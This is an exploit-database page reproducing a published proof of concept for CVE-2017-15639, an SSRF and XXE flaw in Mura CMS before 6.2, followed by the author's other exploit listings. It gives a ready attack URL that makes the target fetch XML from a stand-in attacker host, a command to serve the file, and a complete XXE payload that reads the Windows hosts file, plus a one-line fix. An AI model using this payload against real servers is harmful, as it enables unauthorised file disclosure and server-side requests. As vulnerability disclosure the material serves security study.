Search for hundreds of thousands of exploits

"Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection"

Author

Exploit author

"Anthony Cole"

Platform

Exploit platform

cfm

Release date

Exploit published date

2017-10-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Exploit Title: Mura CMS before 6.2 SSRF + XXE
# Date: 30-10-2017
# Exploit Author: Anthony Cole
# Vendor Homepage: http://www.getmura.com/
# Version: before 6.2
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Tested on: Windows 2008 w/ Coldfusion 8
# CVE: CVE-2017-15639
# Category: webapps
 
1. Description
   
Any user can cause Mura CMS before version 6.2 to make a http request.  As an added bonus, the response from that HTTP GET request is passed directly to XmlParse().  It is possible to read a file from the file system using an XXE attack.
 
   
2. Proof of Concept

vulnerable file is on github, line 50:
https://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm
 
http://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500

Explanation of params
	siteid - The siteid can be obtained by viewing the html source code of the target home page and searching "siteid".
	rssurl - This is the URL you want Mura CMS to call out to.
	
To perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80
	
Then create a file:

<?xml version="1.0" ?>
<!DOCTYPE rss [
        <!ENTITY send SYSTEM "file:///c:\Windows\System32\drivers\etc\hosts">
]>

<rss version="2.0">
<channel>
        <title>title</title>
        <link>link</link>
        <description>description</description>
        <generator>http://www.getmura.com</generator>
        <pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate>
        <language>en-us</language>
        <item>
                <title>Item title</title>
                <link>http://host/</link>
                <guid isPermaLink="false">00000000-0000-0000-0000000000000000</guid>
                <pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate>
                <description>&send;</description>
        </item>
</channel>
</rss>
   
3. Solution:

delete readRSS.cfm from the server.
Release DateTitleTypePlatformAuthor
2020-05-12"TylerTech Eagle 2018.3.11 - Remote Code Execution"webappsjava"Anthony Cole"
2019-01-07"Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data"webappswindows"Anthony Cole"
2017-10-24"Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection"webappscfm"Anthony Cole"
2016-09-22"Microix Timesheet Module - SQL Injection"webappsaspx"Anthony Cole"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/43045/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.